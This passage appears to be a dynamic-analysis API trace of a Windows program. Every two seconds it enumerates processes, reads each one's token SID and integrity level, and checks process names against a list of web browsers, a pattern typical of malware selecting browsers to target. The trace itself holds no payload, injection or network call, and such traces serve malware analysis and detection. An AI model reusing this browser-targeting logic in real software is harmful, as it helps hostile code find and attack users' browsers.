returned 1 [0588.085] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0588.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0588.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x4cc [0588.085] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5b0) returned 1 [0588.085] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0588.085] GetLastError () returned 0x7a [0588.085] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0588.085] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0588.085] CloseHandle (hObject=0x5b0) returned 1 [0588.085] CloseHandle (hObject=0x4cc) returned 1 [0588.085] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0588.085] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5b0) returned 1 [0588.085] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0588.085] GetLastError () returned 0x7a [0588.085] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0588.085] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0588.085] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0588.085] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0588.085] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0588.085] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0588.086] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0588.086] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0588.086] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0588.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0588.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0588.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0588.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x4cc [0588.086] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5b0) returned 1 [0588.086] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0588.086] GetLastError () returned 0x7a [0588.086] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0588.086] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0588.086] CloseHandle (hObject=0x5b0) returned 1 [0588.086] CloseHandle (hObject=0x4cc) returned 1 [0588.086] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0588.086] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5b0) returned 1 [0588.086] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0588.086] GetLastError () returned 0x7a [0588.086] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0588.086] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0588.086] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0588.086] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0588.086] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0588.086] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0588.087] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0588.087] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0588.087] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0588.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0588.087] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0588.087] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0590.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x99d8) returned 0xc0000004 [0590.639] VirtualAlloc (lpAddress=0x0, dwSize=0xa9d8, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0590.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa9d8, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0590.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x660 [0590.640] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0590.640] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0590.640] GetLastError () returned 0x7a [0590.640] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0590.640] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0590.640] CloseHandle (hObject=0x668) returned 1 [0590.641] CloseHandle (hObject=0x660) returned 1 [0590.641] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0590.641] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0590.641] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0590.641] GetLastError () returned 0x7a [0590.641] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0590.641] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0590.641] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0590.641] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0590.641] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0590.641] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0590.641] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0590.641] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0590.641] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0590.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0590.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x660 [0590.641] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0590.641] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0590.641] GetLastError () returned 0x7a [0590.641] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0590.641] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0590.641] CloseHandle (hObject=0x668) returned 1 [0590.641] CloseHandle (hObject=0x660) returned 1 [0590.641] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0590.641] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0590.641] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0590.641] GetLastError () returned 0x7a [0590.641] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0590.641] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0590.641] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0590.641] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0590.641] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0590.641] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0590.641] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0590.641] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0590.641] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0590.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x660 [0590.641] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0590.642] GetLastError () returned 0x7a [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0590.642] CloseHandle (hObject=0x668) returned 1 [0590.642] CloseHandle (hObject=0x660) returned 1 [0590.642] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0590.642] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0590.642] GetLastError () returned 0x7a [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0590.642] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0590.642] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0590.642] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0590.642] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0590.642] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0590.642] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0590.642] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0590.642] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0590.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0590.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x660 [0590.642] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0590.642] GetLastError () returned 0x7a [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0590.642] CloseHandle (hObject=0x668) returned 1 [0590.642] CloseHandle (hObject=0x660) returned 1 [0590.642] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0590.642] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0590.642] GetLastError () returned 0x7a [0590.642] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0590.642] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0590.642] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0590.642] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0590.642] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0590.643] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0590.643] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0590.643] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0590.643] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0590.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0590.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0590.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0590.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x660 [0590.643] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0590.643] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0590.643] GetLastError () returned 0x7a [0590.643] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0590.643] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0590.643] CloseHandle (hObject=0x668) returned 1 [0590.643] CloseHandle (hObject=0x660) returned 1 [0590.643] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0590.643] OpenProcessToken (in: ProcessHandle=0x660, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0590.643] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0590.643] GetLastError () returned 0x7a [0590.643] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0590.643] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0590.643] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0590.643] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0590.643] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0590.643] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0590.643] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0590.643] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0590.643] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0590.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0590.643] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0590.643] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0592.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9a28) returned 0xc0000004 [0592.654] VirtualAlloc (lpAddress=0x0, dwSize=0xaa28, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0592.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xaa28, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0592.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0592.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0592.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0592.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0592.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0592.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0592.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 